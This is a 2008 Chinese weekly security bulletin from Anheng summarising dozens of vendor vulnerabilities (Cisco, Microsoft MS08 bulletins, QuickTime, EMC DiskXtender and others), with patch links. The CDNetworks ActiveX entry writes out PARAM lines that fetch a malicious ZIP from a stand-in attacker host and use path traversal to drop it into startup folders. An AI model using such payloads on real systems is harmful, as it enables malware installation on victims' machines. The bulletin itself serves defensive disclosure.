当前位置: 安全纵横 > 安全公告

一周业界安全动态(4月7日-4月13日)

来源:安恒信息 日期:2008-04

Cisco Unified Communications灾难恢复框架远程命令执行漏洞
灾难恢复框架(DRF)是Cisco Unified Communications产品家族中一些产品间所共享的功能,允许管理员将系统配置备份和恢复到本地磁带驱动或远程服务器。
DRF Master服务器负责执行备份和恢复请求。DRF Master服务器对从网络接收到的请求没有执行认证,未经认证的远程用户可以连接到DRF Master服务器并执行任何DRF相关的任务,包括:
* 修改或删除计划备份
* 将系统备份拷贝到用户指定的远程服务器
?* 从远程服务器恢复用户指定的配置
?* 执行任意操作系统命令?
攻击者可以利用这个漏洞导致拒绝服务、获得敏感配置信息、覆盖配置参数或以完全的管理权限执行任意命令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.cisco.com/cgi-bin/tablebuild.pl/callmgr-utilpage?psrtdcat20e2

 

CA Alert Notification服务多个RPC栈溢出漏洞
Alert Notification Server是很多CA产品中都在使用的服务,用于向控制台用户提供通知。
Alert Notification服务在处理畸形格式的RPC请求时存在漏洞,远程攻击者可能利用此漏洞控制服务器。
Alert Notification服务以GUID 3d742890-397c-11cf-9bf1-00805f88cb72实现了一个RPC接口,该接口在处理各种opcode时使用不安全的库函数将用户提供的数据拷贝到了固定大小的栈缓冲区。如果用户提交了特制的RPC请求的话,就可以触发缓冲区溢出,导致执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=QO96387
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=QO96080
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=QO96079

 

Orbit Downloader URL处理栈溢出漏洞
Orbit Downloader是用于从视频共享网站下载流媒体的下载管理器。
Orbit downloader没有正确地将URL ASCII字符串转换为Unicode,如果用户从特制的URL下载了文件的话就可能导致执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://dl.orbitdownloader.com/dl/OrbitDownloaderSetup.exe

 

F5 BIG-IP管理接口NEW_VALUE参数远程代码注入漏洞
F5 BIG-IP是集成了网络流量管理、应用程序安全管理器、负载均衡等功能的多合一网络设备。
BIG-IP的配置工具实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在系统上执行任意命令。
Web管理接口和CLI所使用的F5 BIG-IP重新配置工具没有正确地过滤某些重新配置请求,如果登录用户拥有Resource Manager或Administrator权限的话,就可以注入任意Perl代码,生成Unix shell命令并以root用户权限执行。
目前厂商还没有提供补丁或者升级程序:http://www.f5.com/bigip

 

Borland StarTeam Multicast服务GMWebHandler::parse_request()栈溢出漏洞
Borland CaliberRM是Borland所捆绑的开发部署解决方案中的企业软件要求管理软件。
CaliberRM的实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制服务器。
目前厂商还没有提供补丁或者升级程序:http://www.borland.com/

 

Opera Web浏览器9.27版本修复多个内存破坏漏洞
Opera是一款流行的WEB浏览器,支持多种平台。
Opera的实现上存在多个安全漏洞,远程攻击者可能利用这些漏洞控制用户系统。
当Opera遇到网页上的newsfeed源时,就会提示用户添加该源为newsfeed。恶意脚本可以控制feed源,导致Opera由于错误的内存访问而出现崩溃或执行任意指令。
HTML CANVAS单元可使用度量图形作为图样。如果精心控制了图形的度量的话,脚本就会导致Opera由于内存破坏而出现崩溃或执行任意代码。
目前厂商已经发布了升级补丁以修复这个安全问题:http://www.opera.com/download/index.dml?custom=yes

 

Apple QuickTime多个远程安全漏洞
Apple QuickTime是一款非常流行的多媒体播放器。
QuickTime的7.4.5之前版本存在多个安全漏洞,允许用户通过畸形的媒体文件获得敏感信息或完全入侵用户系统。


CVE编号

漏洞描述

CVE-2008-1013

QuickTime实现Java方式中的漏洞允许不可信任的Java applet还原序列化QTJava所提供的对象。如果用户受骗访问了包含有恶意Java applet的网页的话,就可能导致泄露敏感信息或以当前用户的权限执行任意代码。

CVE-2008-1014

特制的QuickTime电影可能自动打开外部URL,导致信息泄露

CVE-2008-1015

QuickTime处理数据引用原子的方式可能触发缓冲区溢出,如果用户观看了恶意的电影文件就会导致播放器意外终止或执行任意代码。

CVE-2008-1016

QuickTime处理电影媒体音轨时存在内存破坏漏洞,如果用户观看了恶意的电影文件就会导致播放器意外终止或执行任意代码。

CVE-2008-1017

QuickTime解析crgn原子时存在堆溢出漏洞,如果用户观看了恶意的电影文件就会导致播放器意外终止或执行任意代码。

CVE-2008-1018

QuickTime解析chan原子时存在堆溢出漏洞,如果用户观看了恶意的电影文件就会导致播放器意外终止或执行任意代码。

CVE-2008-1019

QuickTime处理PICT记录时存在堆溢出漏洞,如果用户查看了特制的PICT图形文件就会导致播放器意外终止或执行任意代码

CVE-2008-1020

QuickTime在PICT图形处理期间处理错误消息的方式存在堆溢出漏洞,如果用户查看了特制的PICT图形文件就会导致播放器意外终止或执行任意代码

CVE-2008-1021

QuickTime处理Animation codec内容可能导致堆溢出,如果用户观看了带有Animation codec内容的恶意电影文件的话,就会导致播放器意外终止或执行任意代码。

CVE-2008-1022

QuickTime解析obji原子的方式存在栈溢出漏洞。如果用户查看了特制的QuickTime VR电影文件的话,就会导致播放器意外终止或执行任意代码。

CVE-2008-1023

QuickTime解析Clip opcode可能导致堆溢出漏洞,如果用户查看了特制的PICT图形文件就会导致播放器意外终止或执行任意代码。

目前厂商已经发布了升级补丁以修复这个安全问题:http://www.apple.com

 

SCO UnixWare pkgadd本地权限提升漏洞
UnixWare是由SCO公司开发和维护的商业性质Unix操作系统。
SCO UnixWare在处理环境变量时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。
SCO UnixWare的pkgadd命令没有正确地过滤某个环境变量,如果本地用户在该命令中使用了目录遍历序列(如“../”)的话,就可以覆盖系统文件,获得权限提升。
目前厂商已经发布了升级补丁以修复这个安全问题:http://www.sco.com/support/update/download/release.php?rid=324

 

Symantec AutoFix支持工具SYMADATA.DLL控件多个安全漏洞
Symantec AutoFix是一些Norton产品中所使用的用于排除Symantec客户端产品中问题的工具。
AutoFix支持工具中所捆绑的ActiveX控件(SYMADATA.DLL)实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
控件为:
Clsid:3451DEDE-631F-421c-8127-FD793AFC6CC8
文件:C:\PROGRA~1\COMMON~1\SYMANT~1\SUPPOR~1\SymAData.dll
Version 2.7.0.1
该控件中存在栈溢出,且没有正确地处理launchProcess()调用。如果用户受骗访问了恶意网页的话,就可能触发这些漏洞,导致执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:https://www-secure.symantec.com/techsupp/asa/install.jsp

 

McAfee ePolicy Orchestrator FrameworkService.exe远程拒绝服务漏洞
McAfee ePolicy Orchestrator(ePO)是一种业界领先的系统安全管理解决方案,能够帮助企业有效抵御各种恶意威胁和攻击。
ePO中所使用的McAfee框架服务(FrameworkService.exe)中存在安全漏洞,如果远程攻击者向该服务的默认8081/TCP端口发送了特制请求的话,就可能触发内存破坏,导致服务崩溃。
目前厂商还没有提供补丁或者升级程序:http://www.mcafee.com/

 

HP OpenView网络节点管理器ovalarmsrv.exe服务多个远程漏洞
HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。
OV NNM的ovalarmsrv服务中存在多个远程漏洞,允许远程攻击者执行任意代码或导致拒绝服务。
目前厂商还没有提供补丁或者升级程序:http://itrc.hp.com

 

OTRS SOAP接口缺少认证检查漏洞
OTRS全称为Open Ticket Request System,是用于管理用户投诉和售后问题的系统。
OTRS的认证处理实现上存在漏洞,远程攻击者可能利用此漏洞获取非授权访问。
OTRS没有对SOAP认证执行安全检查,远程用户无需有效的SOAP用户凭据便可以创建连接,导致通过SOAP接口读取和修改对象。
目前厂商已经发布了升级补丁以修复这个安全问题:http://otrs.org/download/

 

Cisco IOS多个DLSw拒绝服务漏洞
Cisco IOS是思科网络设备中所使用的互联网操作系统。
数据-链路交换(DLSw)允许通过IP网络传输IBM系统网络架构(SNA)和网络基本输入/输出系统(NetBIOS)通讯。Cisco的DLSw实现还使用UDP 2067端口和IP 91协 议进行快速顺序传输(FST)。??
Cisco IOS在处理UDP和IP 91协议报文时存在多个漏洞,这些漏洞不影响TCP报文处理,成功攻击可能导致系统重启或设备内存泄露,造成拒绝服务的情况。
Cisco已经为此发布了一个安全公告(cisco-sa-20080326-dlsw)以及相应补丁:cisco-sa-20080326-dlsw:Multiple DLSw Denial of Service Vulnerabilities in Cisco IOS链接
http://www.cisco.com/warp/public/707/cisco-sa-20080326-dlsw.shtml

 

Tumbleweed SecureTransport vcst_eu.dll ActiveX控件远程栈溢出漏洞
Tumbleweed SecureTransport是安全的文件传输解决方案,允许用户通过Internet传输敏感文件。
SecureTransport的FileTransfer ActiveX控件(vcst_en.dll,CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3)中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
目前厂商还没有提供补丁或者升级程序:
http://www.tumbleweed.com/products/securetransport/index.html

 

CDNetworks Nefficient Download ActiveX控件多个安全漏洞
CDNetworks是亚洲最大的CDN服务供应商,提供各种在线游戏和视频服务。
CDNetworks所提供的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
Neffycient Download(NeffyLauncher.dll,AA07EBD2-EBDD-4BD6-9F8F-114BD513492C)是CDNetworks所提供的ActiveX控件,用于通过HTTP、FTP等下载和升级游戏安装文件。如果用户对使用该控件站点的版面拥有写权限的话,或获得了有效的keycode的话,就可以修改HttpSkin、SkinPath的值。站点上的恶意文件必须压缩为ZIP文件,例如,以下修改可以将恶意文件拷贝到Windows的根目录:
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
这样攻击者就可以将SkinPath的值修改为所有用户的开始程序文件夹,当用户启动计算机时就会执行恶意程序。
攻击者还可以通过调试这个ActiveX控件来生成keycode值。keycode值的前两个数字代表域的长度(16进制),接下来的5个(或更多)数字用于计算域。
目前厂商还没有提供补丁或者升级程序:http://www.cdnetworks.com/

 

Microsoft Windows GDI CreateDIBPatternBrushPt函数堆溢出漏洞(MS08-021)
Microsoft Windows是微软发布的非常流行的操作系统。
Windows的GDI函数CreateDIBPatternBrushPt用于处理WMF文件。由于错误地计算了用户数据,可能没有充分地分配堆块并在之后使用了该块,导致堆溢出。此外在解析EMF文件中用于描述文件中所包含位图的头结构时,直接在计算所要分配字节数的算术操作中使用了这个头中的一些值,这个计算可能溢出,最终导致堆溢出。如果用户受骗打开了特制的图形文件的话,就可能触发这些溢出,导致执行任意指令。
Microsoft已经为此发布了一个安全公告(MS08-021)以及相应补丁:MS08-021:Vulnerabilities in GDI Could Allow Remote Code Execution (948590)链接:http://www.microsoft.com/technet/security/Bulletin/MS08-021.mspx

 

Microsoft IE数据流处理远程代码执行漏洞(MS08-024)
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE在处理数据流时存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
如果用户使用Internet Explorer查看了特制网页,网页就可能返回没有注册处理器的非预期MIME类型数据流,触发释放后使用的情况,导致执行任意代码。帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。
Microsoft已经为此发布了一个安全公告(MS08-024)以及相应补丁:MS08-024:Cumulative Security Update for Internet Explorer (947864)链接:http://www.microsoft.com/technet/security/Bulletin/MS08-024.mspx?pf=true

 

Microsoft Windows GDI文件名解析栈溢出漏洞(MS08-021)
Microsoft Windows是微软发布的非常流行的操作系统。
Windows的GDI函数在处理特制EMF图形文件中的文件名参数时存在栈溢出。如果用户受骗打开了特制的图形文件的话,就可能触发这个溢出,导致执行任意指令。
Microsoft已经为此发布了一个安全公告(MS08-021)以及相应补丁:MS08-021:Vulnerabilities in GDI Could Allow Remote Code Execution (948590)链接:http://www.microsoft.com/technet/security/Bulletin/MS08-021.mspx

 

Microsoft Windows hxvz.dll ActiveX控件堆溢出漏洞(MS08-023)
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Help的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
Microsoft Help 2.5安装了以下ActiveX控件:
ProgID:HxVz.HxTocCtrl.1
CLSID:314111B8-A502-11D2-BBCA-00C04F8EC294
文件:%PROGRAM DIR%\Common Files\Microsoft Shared\Help\hxvz.dll
如果向该控件提供了畸形参数的话,就可以破坏堆内存。攻击者可以通过构造特制网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行指令。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。
Microsoft已经为此发布了一个安全公告(MS08-023)以及相应补丁:MS08-023:Security Update of ActiveX Kill Bits (948881)链接:
http://www.microsoft.com/technet/security/Bulletin/MS08-023.mspx?pf=true

 

Microsoft Visio多个远程代码执行漏洞(MS08-019)
Visio是微软Office套件中的图形编辑工具。
Microsoft Visio在打开Visio文件时没有正确地验证对象头数据,在从磁盘将特制的.DXF文件加载到内存时没有正确地验证内存分配。如果用户受骗打开了畸形文档,就可能触发这些漏洞,导致执行任意指令。
Microsoft已经为此发布了一个安全公告(MS08-019)以及相应补丁:MS08-019:Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (949032)链接:http://www.microsoft.com/technet/security/Bulletin/MS08-019.mspx?pf=true

 

Microsoft Windows DNS客户端可预测事件处理ID漏洞(MS08-020)
Microsoft Windows是微软发布的非常流行的操作系统。
Windows DNS客户端服务在执行DNS查询时,随机选择事件处理值没有提供足够的熵。未经认证的攻击者可以向有漏洞客户端的DNS请求返回恶意响应,欺骗或重新定向合法位置的Internet通讯。
Microsoft已经为此发布了一个安全公告(MS08-020)以及相应补丁:MS08-020:Vulnerability in DNS Client Could Allow Spoofing (945553)链接:
http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true

 

Microsoft Project资源内存分配远程代码执行漏洞(MS08-018)
Project是微软Office套件中的项目管理和控制组件。
Microsoft Project在打开Project文件时没有正确地验证内存资源分配。如果用户受骗打开了畸形文档,就可能触发这个漏洞,导致执行任意指令。
Microsoft已经为此发布了一个安全公告(MS08-018)以及相应补丁:MS08-018:Vulnerability in Microsoft Project Could Allow Remote Code Execution (950183)链接:
http://www.microsoft.com/technet/security/Bulletin/MS08-018.mspx?pf=true

 

Microsoft Windows内核用户态回调本地权限提升漏洞(MS08-025)
Microsoft Windows是微软发布的非常流行的操作系统。
Windows内核处理用户传入的数据时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。
Windows内核没有正确验证从用户态传递到内核的输入,允许攻击者以提升的权限运行代码。成功利用此漏洞的攻击者可执行任意代码,并可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
Microsoft已经为此发布了一个安全公告(MS08-025)以及相应补丁:MS08-025:Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)链接:
http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx?pf=true

 

Microsoft VBScript和JScript脚本引擎远程溢出漏洞(MS08-022)
Microsoft Windows是微软发布的非常流行的操作系统。
Windows的VBScript和JScript脚本引擎在处理畸形数据时存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
Windows的VBScript和JScript脚本引擎在解码网页中的脚本时允许脚本加载到内存中运行,这可能导致缓冲区溢出。如果用户打开了特制文件或访问正在运行特制脚本的网站,则此漏洞可能允许远程执行代码。
Microsoft已经为此发布了一个安全公告(MS08-022)以及相应补丁:MS08-022:Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)链接:
http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx?pf=true

 

Cisco IOS的OSPF、MPLS VPN、Sup32、Sup720或RSP720模块拒绝服务漏洞
Cisco IOS是思科网络设备中所使用的互联网操作系统。
如果有漏洞的Cisco设备配置了开放最短路径优先(OSPF)Sham-Link和多协议标签交换(MPLS)虚拟专用网(VPN)的话,就可能受阻断队列、内存泄露和/或设备重启的影响。??
设备必须存在以下硬件和软件配置组合才会受漏洞影响:
* 存在Cisco Catalyst Sup32、Sup720或RSP720
* 配置了MPLS VPN
* 配置了OSPF sham-link
如果满足上述条件的设备接收到了某些报文的话,接收这些报文接口的输入队列就会阻塞,更多通讯无法进入接口,导致拒绝服务的情况。除了可能阻断的接口队列外,设备还可能出现内存泄露或重启。在内存泄露的情况下,一旦耗尽了可用的内存设备就无法转发通讯。
Cisco已经为此发布了一个安全公告(cisco-sa-20080326-queue)以及相应补丁:cisco-sa-20080326-queue:Vulnerability in Cisco IOS with OSPF, MPLS VPN, and Supervisor 32, Supervisor 720, or Route Switch Processor 720链接:
http://www.cisco.com/warp/public/707/cisco-sa-20080326-queue.shtml

 

Microsoft SharePoint服务器图片源码HTML注入漏洞
SharePoint Server是一个服务器功能集成套件,提供全面的内容管理和企业搜索,加速共享业务流程并简化跨界限信息共享。
SharePoint Services 2.0中存在跨站脚本漏洞,在使用文本编辑器添加图片后保存网页时,没有正确地过滤某些字符串。如果用户的浏览器中启用了JavaScript的话,则在用户查看该网页时就会执行图片源码中所嵌入的脚本。
目前厂商还没有提供补丁或者升级程序:
http://www.microsoft.com/technet/security/

 

VLC媒体播放器浏览器插件任意文件覆盖漏洞
VLC Media Player是一款免费的媒体播放器。
VLC Media Player在处理畸形格式的播放列表时存在漏洞,远程攻击者可能利用此漏洞覆盖任意文件。
如果播放列表的文件名中包含有特制:demuxdump-file选项的话,或MP3文件中包含有EXTVLCOPT语句的话,则在打开上述文件时VLC播放器的浏览器插件就可能注入参数,导致覆盖任意文件。
Debian已经为此发布了一个安全公告(DSA-1543-1)以及相应补丁:DSA-1543-1:New vlc packages fix several vulnerabilities
链接:http://www.debian.org/security/2008/dsa-1543

目前厂商已经发布了升级补丁以修复这个安全问题:http://www.videolan.org/mirror-geo.php?file=vlc/0.8.6f/win32/vlc-0.8.6_f-win32.exe
http://download.videolan.org/pub/videolan/vlc/0.8.6f/vlc-0.8.6f.tar.gz

 

HP OpenView网络节点管理器ovspmd远程堆溢出漏洞
HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。
OV NNM的ovspmd服务实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制服务器。
OV NNM的ovspmd服务运行在TCP 8886端口上,该服务检查长度值是否低于9216字节(目标缓冲区的大小)以防范缓冲区溢出,但这是一个有符比较,因此使用0x80000000和0x80000003之间的负数值就可以触发堆溢出,导致执行任意指令。
目前厂商还没有提供补丁或者升级程序:http://itrc.hp.com

 

Adobe ColdFusion CFC方式访问绕过安全限制漏洞
ColdFusion MX是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术,可以与XML、Web Services和Microsoft.NET环境相集成。
ColdFusion MX的组件访问控制实现上存在漏洞,远程非授权用户可能利用此漏洞获取非授权访问。
即使将访问级别设置为public的话,仍可从Flex 2 remoting调用ColdFusion 8中的CFC方式,而根据设计仅有本地执行页面或组件方式才可以使用访问级别设置为public的函数。远程攻击者可以利用这个漏洞访问本应受限的函数。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://kb.adobe.com/selfservice/viewContent.do?externalId=kb403328&sliceId=1

 

Adobe Flash Player SWF文件DeclareFunction2 ActionScript标签堆溢出漏洞
Flash Player是一款非常流行的FLASH播放器。
Flash player在试图访问没有正确实例化的嵌入Actionscript对象时存在堆溢出漏洞,如果攻击者恶意修改了SWF文件中的DeclareFunction2 Actionscript标签的话,则用户打开该文件就可能触发堆溢出,导致以当前登录用户的权限执行任意指令。
Adobe目前厂商已经发布了升级补丁以修复这个安全问题:http://www.adobe.com/go/getflash
RedHat RedHat已经为此发布了一个安全公告(RHSA-2008:0221-01)以及相应补丁:RHSA-2008:0221-01:Critical: flash-plugin security update链接:https://www.redhat.com/support/errata/RHSA-2008-0221.html

 

Adobe Flash Player 9.0.124.0版本修改多个安全漏洞
Flash Player是一款非常流行的FLASH播放器。
Flash Player 9.0.124.0版本修复了多个安全漏洞,成功利用这些漏洞允许恶意用户绕过安全限制、执行跨站脚本或入侵用户系统,具体包括:
1) 处理Declare Function (V7)标签时存在堆溢出漏洞;
2) 处理多媒体文件时存在整数溢出漏洞;
3) 在将主机名绑定到IP地址时的错误可能导致DNS重新绑定攻击;
4) 在发送HTTP头时的错误可能导致绕过跨域策略文件;
5) 强制跨域策略文件中的错误可能导致在承载该文件的Web服务器上绕过某些安全限制;
6) 在处理asfunction:协议时没有正确地验证对某些参数的输入便将其返回给了用户,这可能导致在用户浏览器中注入任意HTML和脚本代码。
Adobe-----目前厂商已经发布了升级补丁以修复这个安全问题:http://www.adobe.com/go/getflash
RedHat------RedHat已经为此发布了一个安全公告(RHSA-2008:0221-01)以及相应补丁:RHSA-2008:0221-01:Critical: flash-plugin security update链接:https://www.redhat.com/support/errata/RHSA-2008-0221.html

 

Python zlib模块远程溢出漏洞
Python是一种开放源代码的脚本编程语言。
Python的zlib扩展模块中用于flush解压流的方式获取一个输入参数来确定应flush多少数据。这个参数是一个有符型整数,没有经过过滤检查,因此如果传送了负值的话就会导致错误的内存分配,然后有符型整数会被转换为无符整数,触发缓冲区溢出。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://svn.python.org/view?rev=62235&view=rev

 

TIBCO多个产品远程溢出漏洞
TIBCO企业消息服务(EMS)是基于标准的消息传送平台,Rendezvous是一套帮助用户快速构建和部署大规模分布式应用的中间件。
TIBCO EMS服务器(tibemsd)在处理某些入站消息时存在缓冲区溢出漏洞,可能导致执行任意指令、拒绝服务或泄露敏感信息。
Rendezvous的以下组件在处理入站消息时也存在缓冲区溢出漏洞,可能导致执行任意指令、拒绝服务或泄露敏感信息。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.tibco.com/software/messaging/rendezvous.jsp

 

IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞
IBiz E-Banking Integrator是用于从银行、投资公司等帐号访问财务交易信息的解决方案。
IBiz E-Banking Integrator所提供的IBizEBank.FIProfile.1 ActiveX控件(fiprofile20.ocx)没有正确地处理对WriteOFXDataFile()方式的调用,如果用户受骗访问了恶意网页的话,就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.nsoftware.com/ibiz/ebank/default.aspx

 

FishSound库远程Speex解码代码执行漏洞
fishsound库提供一个编程接口,允许使用Xiph.Org codec(FLAC、Speex和Vorbis)编码和解码音频数据。
fishsound库所使用的Speex库在处理Speex头时存在数组索引错误,如果特制的Speex流在头中包含有负数的modeID字段的话就可能导致执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.annodex.net/software/libfishsound/download/libfishsound-0.9.1.tar.gz

 

GNU m4格式串及文件名引用漏洞
GNU M4是广泛应用的GNU宏处理器。
GNU M4的src/freeze.c文件中的produce_frozen_state()函数存在格式串处理漏洞,如果向m4 -F传送了特制的文件名参数的话,就可能导致执行任意指令。
GNU M4在实现maketemp和mkstemp宏时存在漏洞,如果输出字符串中包含有特殊字符的话,就可能导致处理不正确的文件。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://git.sv.gnu.org/gitweb/?p=m4.git;a=commit;h=035998112737e52cb229e342913ef404e5a51040
http://git.sv.gnu.org/gitweb/?p=m4.git;a=commit;h=5345bb49077bfda9fabd048e563f9e7077fe335d

 

Interwoven WorkSite Web TransferCtrl Class控件双重释放漏洞
Worksite是Interwoven发布的文档和邮件管理解决方案。
Worksite的iManFile.cab文件所安装的Web TransferCtrl Class ActiveX控件(CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307)在处理Server属性时存在双重释放漏洞。如果用户受骗访问了恶意站点的话,就可以触发这个漏洞,导致执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://worksitesupport.interwoven.com

 

EMC DiskXtender默认凭据权限提升漏洞
EMC DiskXtender是一款数据备份、迁移套件。
DiskXtender产品的主要组件包括文件系统管理器、MediaStor和证书服务器,这些组件都会创建可能远程访问的RPC端点。由于认证代码中包含有硬编码的登录和口令凭据,因此远程攻击者可以连接到这些RPC接口并使用这些凭据登录来绕过正常的认证过程,获得对DiskXtender服务器的管理访问。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.emc.com/products/family/diskxtender-family.htm

 

EMC DiskXtender MediaStor组件远程格式串处理漏洞
EMC DiskXtender是一款数据备份、迁移套件。
DiskXtender产品的MediaStor组件在处理UUID为b157b800-aef5-11d3-ae49-00600834c15f的RPC接口上请求时,服务没有正确地验证请求中格式串的内容。由于该格式串直接传送给了格式化函数,因此远程攻击者可以执行格式串攻击,导致以受影响服务的权限执行任意指令。必须要通过认证才能利用这个漏洞。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://software.emc.com/products/product_family/diskxtender_family.htm

 

EMC DiskXtender文件系统管理器远程栈溢出漏洞
EMC DiskXtender是一款数据备份、迁移套件。
DiskXtender产品的文件系统管理器组件存在栈溢出漏洞。在处理UUID为b157b800-aef5-11d3-ae49-00600834c15f的RPC接口上的请求时,服务没有正确地验证请求中字符串的长度,如果用户提交了超长请求的话就可以触发这个溢出,导致以受影响服务的权限执行任意代码。但必须通过认证才能利用这个漏洞。
目前厂商已经发布了升级补丁以修复这个安全问题:

http://www.emc.com/products/family/diskxtender-family.htm